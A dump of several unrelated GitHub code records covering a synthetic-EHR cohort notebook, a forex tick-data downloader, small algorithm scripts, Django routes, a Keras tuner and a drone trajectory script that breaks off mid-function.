that is designed to make it easy to create cohorts based on synthea resources.\n\n# COMMAND ----------\n\n# MAGIC %run ./config/00-config\n\n# COMMAND ----------\n\n# DBTITLE 1,run to access cohort_builder class\n# MAGIC %run ./cohort-builder\n\n# COMMAND ----------\n\n# DBTITLE 1,read configs\nfrom pprint import pprint\nwith open(f'/tmp/{project_name}_configs.json','r') as f:\n settings = json.load(f)\n delta_path = settings['delta_path']\npprint(settings)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Now we specify our experiment's main parameters, namely: target medication (intervention under study), target event (event defining cohort entry date), and the target outcome (outcome under study)\n\n# COMMAND ----------\n\n# DBTITLE 1,define parameters\ntarget_params = {\n # set the target drug med code\n 'target_med_code':20134224, # databrixovir \n # set the target drug name\n 'target_med_name':'databrixovir',\n # set the target event code\n 'target_event_code':840539006,\n # set the target event name\n 'target_event_name':'covid',\n # set the target outcome\n 'target_outcome' : 'admission',\n 'target_outcome_code': 1505002\n}\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC We also would like to include information regarding past histroy of comorbidities (for example obesity etc) that can be later used in our propencity score matching\n\n# COMMAND ----------\n\n# DBTITLE 1,define comorbidities\ncomorbidities = {\n'obesity':[162864005,408512008],\n'hypertension':[59621000],\n'heart_disease':[53741008], \n'diabetes':[44054006],\n'smoking':[449868002],\n}\n\n# COMMAND ----------\n\n# DBTITLE 1,log parameteres\nimport mlflow\nmlflow.set_experiment(settings['experiment_name'])\nwith mlflow.start_run(run_name='cohort-creation'):\n mlflow.log_params({**comorbidities, **target_params})\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## 1. cohort creation\n# MAGIC To make cohort creation and ETL easier, we created a class `DeltaEHR` that makes data pre-processing easier. Using the available methods we create target and outcome cohorts, based on our inclusion/exclusion criteria. First we start by adding our target cohort (patients diagnosed with covid) and outcome cohort (patients who have been admitted to the hospital). Eeach cohort is then automatically added to the collection of cohorts. Each chort contains three columns, patinet id (`PATIENT`), cohort start index date (`START`) and cohort exit date (`STOP`).\n\n# COMMAND ----------\n\n# DBTITLE 1,add cohorts\ndelta_ehr=DeltaEHR(delta_path)\ndelta_ehr.add_simple_cohort(cohort_name='covid',resource='conditions',inclusion_criteria=f\"CODE=={target_params['target_event_code']}\")\ndelta_ehr.add_simple_cohort(cohort_name='admission',resource='encounters',inclusion_criteria=f\"REASONCODE == {target_params['target_event_code']} AND CODE == {target_params['target_outcome_code']}\")\ndelta_ehr.add_simple_cohort(cohort_name='deceased',resource='patients',inclusion_criteria=\"DEATHDATE is not null\",start_col='DEATHDATE',stop_col='DEATHDATE')\ntarget_cohort=delta_ehr.cohorts['covid']\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC next we specify which demographic information to inlclude in the dataset\n\n# COMMAND ----------\n\n# DBTITLE 1,specify demographic features to include\ndelta_ehr.set_patient_list(demog_list=['BIRTHDATE','MARITAL','RACE','ETHNICITY','GENDER'])\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC\n# MAGIC Now we add cohorts based on prior events (comorbidities, drug exposure etc). For each comorbid condition of interest, we choose a window of time \n# MAGIC to go back and look for any record of diagnosis of, or exposure to, of a condition of interest. This is done simply by using the `add_cohort` method \n# MAGIC defined in `DeltaEHR` class. This method also allows you to specify a washout window (`gate_window`) as a buffer in cases where we want to ensure effects of treatments do not interfere. For example if this is specified to\n# MAGIC 10 days, then if there is an instance of a comorbidity diagnosis within 10 dyas of the target ourcome, we do not inlcude that event. Note that\n# MAGIC if you speciy a negative value for the washout window you can include evnets occuring after the target event (see below)\n# MAGIC\n# MAGIC \n\n# COMMAND ----------\n\n# DBTITLE 1,add comorbidity cohorts\nfor event,codes in list(comorbidities.items()):\n delta_ehr.add_cohort('conditions', event, codes,3*365,10, 'covid')\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Now we add the cohort of patinets that have received the target treatment with 10 days of being diagnosed with covid. This is done the same way as adding cohorts based on historic events, with the difference that in this case we set `hist_winodw=0` and `gate_window=-10`\n\n# COMMAND ----------\n\n# DBTITLE 1,add treatment cohort\ndelta_ehr.add_cohort('medications', target_params['target_med_name'], target_params['target_med_code'], 0,-10, 'covid')\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Optionally you can also add cohorts correspodning to other treatments, for example:\n# MAGIC\n# MAGIC ```\n# MAGIC meds_test=(\n# MAGIC delta_ehr.tables['medications'].filter(\"to_date(START) > to_date('2020-01 01')\")\n# MAGIC .join(\n# MAGIC delta_ehr.cohorts['covid'].select('PATIENT'),on='PATIENT')\n# MAGIC .join(delta_ehr.cohorts['admission'].select('PATIENT'),on='PATIENT')\n# MAGIC .groupBy('CODE','DESCRIPTION')\n# MAGIC .count()\n# MAGIC .orderBy(desc('count'))\n# MAGIC .limit(20)\n# MAGIC .collect()\n# MAGIC )\n# MAGIC\n# MAGIC medications={f\"m_{m['CODE']}\":m['CODE'] for m in meds_test}\n# MAGIC for med,codes in list(medications.items()):\n# MAGIC delta_ehr.add_cohort('medications', med, codes,0,-10, 'covid')\n# MAGIC ```\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC we can also add cohort of patients experiencing other symptoms such as blood clots within 20 days of diagnosis with covid\n\n# COMMAND ----------\n\nblood_clot={\"blood_clot\":234466008}\ndelta_ehr.add_cohort('conditions','blood_clot',234466008, 0, -20,'covid')\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## 2. create dataset\n# MAGIC Now we creat the final dataset for our downstream analysis. One of the methods in `DeltaEHR` is `get_cohort_tags()`. This method combines all cohort information in form of columns of indicator functions (cohort membership indicator) and the cohort index date correspoding to each patient id.\n\n# COMMAND ----------\n\n# DBTITLE 1,assemble Cohort Dataset\ndata_df=delta_ehr.combine_all_cohorts()\ndata_df.createOrReplaceTempView(\"delta_ehr_cohorts\")\ndisplay(data_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## 3. Exploratory Analysis\n# MAGIC Now let's take a look at the dataset and look at trends, such as number of individuals diagnosed with the target condition (covid) over time, and demographic trends and other statistics of interest.\n\n# COMMAND ----------\n\n# DBTITLE 1,number of covid patients\ncovid_counts_by_age_df= sql(\"\"\"\n SELECT covid_START, 20*cast(age_at_covid/20 as integer) as age_band, count(*) as count\n FROM delta_ehr_cohorts\n WHERE is_covid == 1\n group by 1, 2\n order by covid_START\n\"\"\")\ndisplay(covid_counts_by_age_df)\n\n# COMMAND ----------\n\n# DBTITLE 1,infection wave by age group\nimport plotly.express as px\ndf = covid_counts_by_age_df.toPandas()\nfig = px.bar(df, x=\"covid_START\", color='age_band',barmode='stack',y=\"count\")\nfig.show()\n\n# COMMAND ----------\n\n# DBTITLE 1,hypertension frequency by race\n# MAGIC %sql\n# MAGIC SELECT race, avg(is_hypertension) as hypertension_frequency\n# MAGIC FROM delta_ehr_cohorts\n# MAGIC GROUP BY race\n# MAGIC order by 2\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Now let's take a look at some of the trends regarding reported blood clot occurances, such as dirtribution of blood clots among covid patients vs others, distribution of the timeframe within which a blood clot is reported, and look at demographic patterns that may be correlated with these timeframes.\n\n# COMMAND ----------\n\n# DBTITLE 0,blood clot\n# MAGIC %sql\n# MAGIC SELECT is_covid,\n# MAGIC sum(is_blood_clot) as count\n# MAGIC FROM delta_ehr_cohorts\n# MAGIC GROUP BY is_covid\n\n# COMMAND ----------\n\n# DBTITLE 1,Blood clots by age and gender\n# MAGIC %sql\n# MAGIC\n# MAGIC SELECT gender,\n# MAGIC age_at_blood_clot,\n# MAGIC count(*) as count\n# MAGIC FROM delta_ehr_cohorts\n# MAGIC WHERE is_blood_clot == 1\n# MAGIC GROUP BY age_at_blood_clot, gender\n# MAGIC ORDER BY age_at_blood_clot\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Now let's compare admission rates among patinets who have received the treatment and those who have not\n\n# COMMAND ----------\n\n# DBTITLE 1,look at the admission probability for the target treatment\ndata_df.filter(f\"is_{target_params['target_event_name']}==1\")\\\n .groupBy(f\"is_{target_params['target_med_name']}\")\\\n .agg(\n avg(f\"is_{target_params['target_outcome']}\").alias('admission_probability'))\\\n .display()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC as we see, overall the admission rates are lower among those who have received the traget treatmnet, however this can be confunded by many factors, for example it can be the case that younger patients are more likely receive the treatment and also being young less likely being admitted to the hospital. In this case we cannot attribute lower admission rates to the treatment. In the next notebook, we use propencity score matching to correct for such confunding factors. But first, let's write the resulting dataset to delta silver layer.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## 4. Write final dataset to Delta\n# MAGIC Now we write the resulting dataset back in the delta lake for our next analysis that is specifically looking into the effect of databrixovir on hospital admissions\n\n# COMMAND ----------\n\ndata_df.write.mode('overwrite').option(\"overwriteSchema\", \"true\").save(f\"{delta_path}/silver/patient_data\")\n","repo_name":"databricks-industry-solutions/psm","sub_path":"2-data-prep-and-analysis.py","file_name":"2-data-prep-and-analysis.py","file_ext":"py","file_size_in_byte":10689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70498037285","text":"# Sample usage:\n# ./dl_bt_dukascopy.py -p EURUSD -y 2013,2014\n\nimport sys\nimport os\nimport argparse\nimport datetime\nimport time\nimport urllib.request, socket\nfrom urllib.error import HTTPError,ContentTooShortError\ntry:\n import lzma\nexcept ImportError:\n from backports import lzma\nfrom struct import *\nimport csv\nimport subprocess\n\nintlist = lambda l: list(map(int, l))\n\n# Create a mapping of currencies.\nall_currencies = {\n # Currency pairs.\n \"AUDJPY\": 1175270400, # starting from 2007.03.30 16:00\n \"AUDNZD\": 1229961600, # starting from 2008.12.22 16:00\n \"AUDUSD\": 1175270400, # starting from 2007.03.30 16:00\n \"CADJPY\": 1175270400, # starting from 2007.03.30 16:00\n \"CHFJPY\": 1175270400, # starting from 2007.03.30 16:00\n \"EURAUD\": 1175270400, # starting from 2007.03.30 16:00\n \"EURCAD\": 1222167600, # starting from 2008.09.23 11:00\n \"EURCHF\": 1175270400, # starting from 2007.03.30 16:00\n \"EURGBP\": 1175270400, # starting from 2007.03.30 16:00\n \"EURJPY\": 1175270400, # starting from 2007.03.30 16:00\n \"EURNOK\": 1175270400, # starting from 2007.03.30 16:00\n \"EURSEK\": 1175270400, # starting from 2007.03.30 16:00\n \"EURUSD\": 1175270400, # starting from 2007.03.30 16:00\n \"GBPCHF\": 1175270400, # starting from 2007.03.30 16:00\n \"GBPJPY\": 1175270400, # starting from 2007.03.30 16:00\n \"GBPUSD\": 1175270400, # starting from 2007.03.30 16:00\n \"NZDUSD\": 1175270400, # starting from 2007.03.30 16:00\n \"USDCAD\": 1175270400, # starting from 2007.03.30 16:00\n \"USDCHF\": 1175270400, # starting from 2007.03.30 16:00\n \"USDJPY\": 1175270400, # starting from 2007.03.30 16:00\n \"USDNOK\": 1222639200, # starting from 2008.09.28 22:00\n \"USDSEK\": 1222642800, # starting from 2008.09.28 23:00\n \"USDSGD\": 1222642800, # starting from 2008.09.28 23:00\n \"AUDCAD\": 1266318000, # starting from 2010.02.16 11:00\n \"AUDCHF\": 1266318000, # starting from 2010.02.16 11:00\n \"CADCHF\": 1266318000, # starting from 2010.02.16 11:00\n \"EURNZD\": 1266318000, # starting from 2010.02.16 11:00\n \"GBPAUD\": 1266318000, # starting from 2010.02.16 11:00\n \"GBPCAD\": 1266318000, # starting from 2010.02.16 11:00\n \"GBPNZD\": 1266318000, # starting from 2010.02.16 11:00\n \"NZDCAD\": 1266318000, # starting from 2010.02.16 11:00\n \"NZDCHF\": 1266318000, # starting from 2010.02.16 11:00\n \"NZDJPY\": 1266318000, # starting from 2010.02.16 11:00\n \"XAGUSD\": 1289491200, # starting from 2010.11.11 16:00\n \"XAUUSD\": 1305010800, # starting from 2011.05.10 07:00\n \n \"SAPDEEUR\": 1429135200, # starting from 2015.04.16 00:00\n \"SDFDEEUR\": 1429048800, # starting from 2015.04.15 00:00\n \"SIEDEEUR\": 1429480800, # starting from 2015.04.20 00:00\n \"TKADEEUR\": 1428962400, # starting from 2015.04.14 00:00\n \"TUI1DEEUR\": 1429048800, # starting from 2015.04.15 00:00\n \"USA30IDXUSD\": 1356994800, # starting from 2013.01.01 00:00\n \"USA500IDXUSD\": 1356994800, # starting from 2013.01.01 00:00\n \"USATECHIDXUSD\": 1356994800, # starting from 2013.01.01 00:00\n \"VNADEEUR\": 1428962400, # starting from 2015.04.14 00:00\n \"VOW3DEEUR\": 1428962400, # starting from 2015.04.14 00:00\n\n\n # commodities\n #\"E_Light\": 1324375200, # Light starting from 2011.12.20 10:00\n #\"E_Brent\": 1326988800, # Brent starting from 2012.01.19 16:00\n #\"E_Copper\": 1326988800, # Copper starting from 2012.01.19 16:00\n\n # indices\n #\"E_DJE50XX\": 1326988800, # Europe 50 starting from 2012.01.19 16:00\n #\"E_CAAC40\": 1326988800, # France 40 starting from 2012.01.19 16:00\n #\"E_Futsee100\": 1326988800, # UK 100 starting from 2012.01.19 16:00\n #\"E_DAAX\": 1326988800, # Germany 30 starting from 2012.01.19 16:00\n #\"E_SWMI\": 1326988800, # Switzerland 20 starting from 2012.01.19 16:00\n #\"E_NQcomp\": 1326988800, # US Tech Composite starting from 2012.01.19 16:00\n \"E_Nysseecomp\": 1326988800, # US Composite starting from 2012.01.19 16:00\n #\"E_DJInd\": 1326988800, # US 30 starting from 2012.01.19 16:00\n #\"E_NQ100\": 1326988800, # US 100 Tech starting from 2012.01.19 16:00\n #\"E_SandP500\": 1326988800, # US 500 starting from 2012.01.19 16:00\n #\"E_AMMEKS\": 1326988800, # US Average starting from 2012.01.19 16:00\n #\"E_HKong\": 1328475600, # Hong Kong 40 starting from 2012.02.05 21:00\n \"E_SCKorea\": 1326988800, # Korea 200 starting from 2012.01.19 16:00\n #\"E_N225Jap\": 1328486400, # Japan 225 starting from 2012.02.06 00:00\n\n # stocks\n #\"E_BAY\": 1330948800, # Bayer starting from 2012.03.05 12:00\n #\"E_BLTLON\": 1333101600, # BHP Billiton starting from 2012.03.30 10:00\n #\"E_EN\": 1348146000, # Enel starting from 2012.09.20 13:00\n #\"E_ENIMIL\": 1348146000, # Eni starting from 2012.09.20 13:00\n #\"E_C07SES\": 1348149600, # Jardine Matheson starting from 2012.09.20 14:00\n #\"E_D05SES\": 1348149600, # DBS Group starting from 2012.09.20 14:00\n #\"E_AAPL\": 1333101600, # Apple starting from 2012.03.30 10:00\n #\"E_AMZN\": 1324375200, # Amazon starting from 2011.12.20 10:00\n #\"E_KO\": 1324375200, # Coca Cola starting from 2011.12.20 10:00\n\n \"E_VIXX\": 1326988800, # Cboe Volatility Index starting from 2012.01.19 16:00\n}\n\nclass Dukascopy:\n url_tpl = \"http://www.dukascopy.com/datafeed/%s/%04d/%02d/%02d/%02dh_ticks.bi5\"\n\n def __init__(self, pair, year, month, day, hour, dest = \"download/dukascopy\"):\n if not os.path.exists(dest):\n os.makedirs(dest)\n self.year = year\n self.month = month\n self.day = day\n self.hour = hour\n self.url = self.url_tpl % (pair, int(year), month - 1, day, hour)\n self.path = \"%s/%04d/%02d/%04d-%02d-%02d--%02dh_ticks.bi5\" % (dest, year, month, year, month, day, hour)\n\n def download(self):\n print(\"Downloading %s into: %s...\" % (self.url, self.path))\n if os.path.isfile(self.path):\n print(\"File (%s) exists, so skipping.\" % (self.path));\n return True\n else:\n if not os.path.exists(os.path.dirname(self.path)):\n os.makedirs(os.path.dirname(self.path))\n i = 1\n while i <= 5:\n try:\n urllib.request.urlretrieve(self.url, filename=self.path)\n break\n except HTTPError as err:\n print(\"Error: %s, reason: %s. Retrying (%i)..\" % (err.code, err.reason, i));\n i += 1\n except IOError as err:\n print(\"Error: %s, reason: %s. Retrying (%i)..\" % (err.errno, err.strerror, i));\n i += 1\n except socket.timeout as err:\n print(\"Network error: %s. Retrying (%i)..\" % (err.strerror, i));\n i += 1\n except socket.error as err:\n print(\"Network error: %s. Retrying (%i)..\" % (err.strerror, i));\n i += 1\n except ContentTooShortError as err:\n print(\"Error: The downloaded data is less than the expected amount, so skipping.\")\n i += 1\n\n if i == 5:\n return False\n\n return True\n\n def bt5_to_csv(self):\n try:\n fileSize = os.stat(self.path).st_size\n if fileSize == 0:\n print(\"File (%s) is empty\" % (self.path))\n return\n except FileNotFoundError:\n return False\n\n new_path = self.path.replace(\"bi5\", \"csv\")\n if os.path.isfile(new_path):\n print(\"CSV file (%s) exists, so skipping.\" % (new_path));\n\n print(\"Converting into CSV (%s)...\" % (new_path))\n\n # Opening, uncompressing & reading raw data\n try:\n with lzma.open(self.path) as f:\n data = f.read()\n # Workaround for liblzma bug (https://bugs.python.org/issue21872)\n except EOFError:\n print(\"Info: Ran into liblzma decompressor bug, falling back to command line decompression...\")\n try:\n pipe = subprocess.Popen(['xz', '-dc', self.path], stdout=subprocess.PIPE)\n except FileNotFoundError:\n print(\"Error: Unable to find the 'xz' LZMA decompressor utility in your PATH, moving on.\")\n return False\n data, error = pipe.communicate()\n\n # Opening output CSV file for write\n f = open(new_path, 'w', newline='')\n w = csv.writer(f, quoting = csv.QUOTE_NONE)\n\n for i in range(0, len(data)//20):\n row = bytearray()\n for j in range(0, 20):\n row.append(data[i*20 + j])\n\n # Big-endian to Little-endian conversion\n row = unpack('>iiiff', row)\n\n # Calculating & formatting column values\n minute = row[0]/1000//60\n second = row[0]/1000 - minute*60\n timestamp = \"%d.%02d.%02d %02d:%02d:%06.3f\" % (self.year, self.month, self.day, self.hour, minute, second)\n bidPrice = row[2]/1e5\n askPrice = row[1]/1e5\n bidVolume = \"%.2f\" % (row[4])\n askVolume = \"%.2f\" % (row[3])\n\n # Writing one row in CSV format\n w.writerow([timestamp, bidPrice, askPrice, bidVolume, askVolume])\n f.close()\n\nif __name__ == '__main__':\n\n # Parse arguments.\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\"-?\", \"--help\", action=\"help\", help=\"Show this help message and exit.\" )\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", help=\"Increase output verbosity.\" )\n parser.add_argument(\"-D\", \"--download-dir\", action=\"store\", dest=\"dest\", help=\"Directory to download files.\", default=\"download/dukascopy\")\n parser.add_argument(\"-c\", \"--csv-convert\", action=\"store_true\", dest=\"csv\", help=\"Perform CSV conversion.\")\n parser.add_argument(\"-p\", \"--pairs\", action=\"store\", dest=\"pairs\", help=\"Pair(s) to download (separated by comma).\", default=\"all\")\n parser.add_argument(\"-h\", \"--hours\", action=\"store\", dest=\"hours\", help=\"Hour(s) to download (separated by comma).\", default=\"all\")\n parser.add_argument(\"-d\", \"--days\", action=\"store\", dest=\"days\", help=\"Day(s) to download (separated by comma).\", default=\"all\")\n parser.add_argument(\"-m\", \"--months\", action=\"store\", dest=\"months\", help=\"Month(s) to download (separated by comma).\", default=\"all\")\n parser.add_argument(\"-y\", \"--years\", action=\"store\", dest=\"years\", help=\"Year(s) to download (separated by comma).\", default=\"all\")\n args = parser.parse_args()\n\n curr_year = datetime.date.today().year\n pairs = list(all_currencies.keys()) if args.pairs == \"all\" else args.pairs.split(',')\n hours = range(1, 23+1) if args.hours == \"all\" else intlist(args.hours.split(','))\n days = range(1, 31+1) if args.days == \"all\" else intlist(args.days.split(','))\n months = range(1, 12+1) if args.months == \"all\" else intlist(args.months.split(','))\n years = range(1997, curr_year+1) if args.years == \"all\" else intlist(args.years.split(','))\n\n try:\n currencies = []\n for pair in sorted(pairs):\n for year in sorted(years):\n for month in sorted(months):\n for day in sorted(days):\n for hour in sorted(hours):\n try:\n dt = datetime.datetime(year=year, month=month, day=day, hour=hour)\n unix = time.mktime(dt.timetuple())\n if unix > all_currencies.get(pair) and unix < time.time(): # Validate dates.\n ds = Dukascopy(pair, year, month, day, hour, dest=args.dest + \"/\" + pair)\n ds.download()\n if args.csv:\n ds.bt5_to_csv()\n #raise KeyboardInterrupt # perform one record for testing\n except ValueError: # Ignore invalid dates.\n continue\n except KeyboardInterrupt:\n sys.exit()\n","repo_name":"alexanu/Python_Trading_Snippets","sub_path":"data/FX_CFD/Duka/DUKA_2_CSV.py","file_name":"DUKA_2_CSV.py","file_ext":"py","file_size_in_byte":12226,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"52"} +{"seq_id":"37591680580","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\nN = int(input())\r\n\r\nqueue = []\r\nfor _ in range(N):\r\n S = deque(input().split())\r\n queue.append(S)\r\n\r\nL = deque(input().split())\r\nwhile L:\r\n word = L.popleft()\r\n for i in range(N):\r\n if queue[i] and queue[i][0] == word:\r\n queue[i].popleft()\r\n break\r\n else:\r\n L.append(word)\r\n break\r\n\r\nanswer = \"Possible\"\r\nif L:\r\n answer = \"Impossible\"\r\n\r\nfor q in queue:\r\n if q:\r\n answer = \"Impossible\"\r\n break\r\n\r\nprint(answer)","repo_name":"ict-cspark/Algorithm","sub_path":"백준/Silver/14713. 앵무새/앵무새.py","file_name":"앵무새.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75352215524","text":"import random\n\n# Límite para x,y fijo en 10.000\n# R fijo <= 10.000\n# \n\nin_txt = input(\"nombre del txt\\n\")\n\nU = input(\"Escribí el U\\n\")\nwhile (int(U) > 10):\n U = input(\"U tiene que ser menor igual a 10. Probá otra vez\\n\")\n\nV = input(f\"Escribí el V, tiene que ser mayor igual a {U}\\n\")\nwhile (int(V) < int(U) or int(V) > 10):\n V = input(f\"V tiene que ser mayor igual a {U} y menor igual que 10. Probá otra vez\\n\")\n\nR = input(f\"Escribí el R\\n\")\nwhile (int(R) > 10000):\n R = input(f\"R tiene que ser menor igual que 10000. Probá otra vez\\n\")\n\nfile = open(f\"{in_txt}.txt\", \"w\")\n\nC = input(\"Cuantos casos de test queres?\\n\")\n\nfile.write(f\"{C}\\n\")\n\n\ndef generar_pares_unicos(n):\n pares = []\n\n while len(pares) < n:\n num1 = random.randint(0, n * 10)\n num2 = random.randint(0, n * 10)\n\n if [num1, num2] not in pares and [num2, num1] not in pares:\n pares.append([num1, num2])\n file.write(f\"{num1} {num2}\\n\")\n\n\ndef generar_test(n, w):\n line = f\"{n} {R} {w} {U} {V}\\n\"\n file.write(line)\n generar_pares_unicos(n)\n \nelegidos = []\n\nfor i in range(int(C)):\n n = random.randint(0, 1000)\n # no repetimos numeros\n while (n in elegidos):\n n = random.randint(0, 1000)\n w = random.randint(0, n-1)\n #w = n-1\n elegidos.append(n)\n generar_test(n, w)\n\n# while n < 1000:\n# w = 0\n# while w < n:\n# line = f\"{n} {R} {w} {U} {V}\\n\"\n# file.write(line)\n# generar_pares_unicos(n)\n# w += 10\n# n += 10\n","repo_name":"LeoBrasileo/AyED3-TPS","sub_path":"TP2/Ej3/Experimentos/inputs/generar_random.py","file_name":"generar_random.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"203862855","text":"from django.urls import path\nfrom .views import BusquedaListCreate, ByBusquedaIdView, FinalizadasView, BusquedaFinalizada, ByUserIdView, BusquedaVacia\n\napp_name = 'busqueda'\n\nurlpatterns = [\n path('', BusquedaListCreate.as_view(), name='create'),\n path('id_busqueda/', ByBusquedaIdView.as_view(), name=\"busquedaById\"),\n path('user/', ByUserIdView.as_view(), name=\"userById\"),\n path('finalizadas', FinalizadasView.as_view(), name='finalizadas'),\n path('busqueda_finalizada/', BusquedaFinalizada.as_view(), name='busqueda_finalizada'),\n path('busqueda_vacia/', BusquedaFinalizada.as_view(), name='busqueda_vacia'),\n\n]","repo_name":"gastondg/API-Extractor","sub_path":"extractor/busqueda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18183056374","text":"import networkx as nx\nimport matplotlib.pyplot as plt \nfrom backend.utils import multi_dict\n\ndef get_distance_matrix(graph, points):\n distance = multi_dict(2, tuple)\n for u in points:\n for v in points:\n if u == v:\n distance[u][v] = 0\n else:\n distance[u][v] = nx.shortest_path_length(graph, source = u, target = v)\n distance[v][u] = distance[u][v]\n return distance\n\n\ndef create_graph(points, distance):\n G = nx.MultiGraph()\n for u in points:\n for v in points:\n if u!=v and G.has_edge(u, v) is False:\n G.add_edge(u, v, weight = distance[u][v])\n \n return G\n\n\ndef get_nodes_with_odd_degree(G):\n odd_degree_nodes = []\n for node in G.nodes:\n if G.degree(node)%2 == 1:\n odd_degree_nodes.append(node)\n \n return odd_degree_nodes\n\n\ndef min_weight_perfect_matching(T, G):\n visited = {}\n nodes = list(G.nodes)\n for i in nodes:\n if visited.get(i) is None:\n min_dist = 1000000\n node = None\n for j in nodes:\n if i!=j and visited.get(j) is None:\n if G.adj[i][j][0]['weight'] < min_dist:\n min_dist = G.adj[i][j][0]['weight']\n node = j\n visited[i] = True\n visited[node] = True\n T.add_edge(i, node, weight = min_dist)\n\n\ndef get_euler_tour(G, u, euler_tour):\n euler_tour.append(u)\n neighbours = list(G.adj[u])\n for v in neighbours:\n if len(G.adj[u])>0 and is_valid_edge(G, u, v):\n G.remove_edge(u, v)\n get_euler_tour(G, v, euler_tour)\n\n\ndef is_valid_edge(G, u, v):\n if len(G.adj[u]) == 1: \n return True\n visited = {}\n count_before_removal = dfs_count(G, u, visited)\n edge_weight = G.adj[u][v][0]['weight']\n G.remove_edge(u, v)\n visited = {}\n count_after_removal = dfs_count(G, u, visited)\n G.add_edge(u, v, weight = edge_weight) \n return False if count_after_removal None:\n \"\"\"Evaluate the current set of hypermarameters with cross-validation.\n\n Args:\n trial: A Trial instance passed by the tuner, with the hyperparameters.\n dataset: The training data.\n n_splits: The number of folds to use, defaults to 5.\n\n Returns:\n None\n\n \"\"\"\n val_losses = []\n shuffled_dataset = dataset.shuffle(buffer_size=len(dataset))\n shards = [shuffled_dataset.shard(n_splits, i) for i in range(n_splits)]\n for split in range(n_splits):\n dataset_train, dataset_val = self._cv_concatenate(shards, split)\n model = self.hypermodel.build(trial.hyperparameters, dataset_train)\n print(f\"Fitting model (CV {split + 1} / {n_splits})...\")\n class_weight = DataPreprocessor.get_class_weight(dataset_train)\n model.fit(dataset_train, class_weight=class_weight)\n print(f\"Evaluating model (CV {split + 1} / {n_splits})...\")\n val_losses.append(model.evaluate(dataset_val))\n self.oracle.update_trial(trial.trial_id, {\"val_loss\": np.mean(val_losses)})\n self.save_model(trial.trial_id, model)\n\n def _cv_concatenate(self, shards: Sequence[tf.data.Dataset], index: int) -> Tuple[tf.data.Dataset, tf.data.Dataset]:\n \"\"\"Isolate the validation batches (at position `index`),\n and concatenate the other ones in one dataset.\n\n Args:\n shards: A list of batches.\n index: The batches used for validation.\n\n Returns:\n The training and validation batches as a tuple.\n\n \"\"\"\n if index == 0:\n return self._concatenate(shards[1:]), shards[0]\n elif index == len(shards) - 1:\n return self._concatenate(shards[:-1]), shards[-1]\n else:\n return self._concatenate(shards[:index]).concatenate(self._concatenate(shards[index + 1 :])), shards[index]\n\n @staticmethod\n def _concatenate(datasets: Sequence[tf.data.Dataset]) -> tf.data.Dataset:\n \"\"\"Concatenate a sequence of tensorflow datasets.\n\n Args:\n datasets: The datasets to concatenate.\n\n Returns:\n A concatenated dataset.\n\n \"\"\"\n dataset, *others = datasets\n for other in others:\n dataset = dataset.concatenate(other)\n return dataset\n","repo_name":"prouhard/autoyml","sub_path":"autoyml/tuner.py","file_name":"tuner.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27364838580","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\n\r\n##################################################################\r\n#step 1: import data (trajectory data, car profile)\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np \r\nfrom numpy.polynomial.polynomial import polyfit\r\nimport os\r\nimport math\r\nfrom matplotlib import cm\r\nimport multiprocessing \r\nfrom multiprocessing import Pool\r\nos.chdir('/home/yina/Desktop/drone_data')\r\nprint(os.getcwd())\r\nprint(\"loadingdtata\")\r\npixel_data=pd.read_csv('out_DJI_0002.csv', skiprows=[0])\r\npixel_data['carCenterY']=-pixel_data['carCenterY']\r\npixel_data['frameNUM'].max()\r\n#car_data=pd.read_csv('CarProfile.csv')\r\nprint(\"finished loading\")\r\n\r\n##################################################################\r\n#step 2: generate leave arrive table\r\n#generate car profile\r\ncar_data=pixel_data.groupby('carID').agg({'carID': np.min,'carL': np.min,'carW': np.min})\r\nprint(\"generate car profile\")\r\ncar_data.to_csv(\"CarProfile_07130723am.csv\",index=True,sep=',')\r\n\r\n#for calculate the angle between two vehicles' centerpoints\r\nclass Vect:\r\n\r\n def __init__(self, a, b):\r\n self.a = a\r\n self.b = b\r\n\r\n def findClockwiseAngle(self, other):\r\n return -math.degrees(math.asin((self.a * other.b - self.b * other.a)/(self.length()*other.length())))\r\n def length(self):\r\n return math.sqrt(self.a**2 + self.b**2)\r\n#define the function of bresenham\r\n\r\ndef Bresenham(x1,y1,x2,y2):\r\n\r\n dx = x2 - x1\r\n dy = y2 - y1\r\n \r\n # Determine how steep the line is\r\n is_steep = abs(dy) > abs(dx)\r\n \r\n # Rotate line\r\n if is_steep:\r\n x1, y1 = y1, x1\r\n x2, y2 = y2, x2\r\n \r\n # Swap start and end points if necessary and store swap state\r\n swapped = False\r\n if x1 > x2:\r\n x1, x2 = x2, x1\r\n 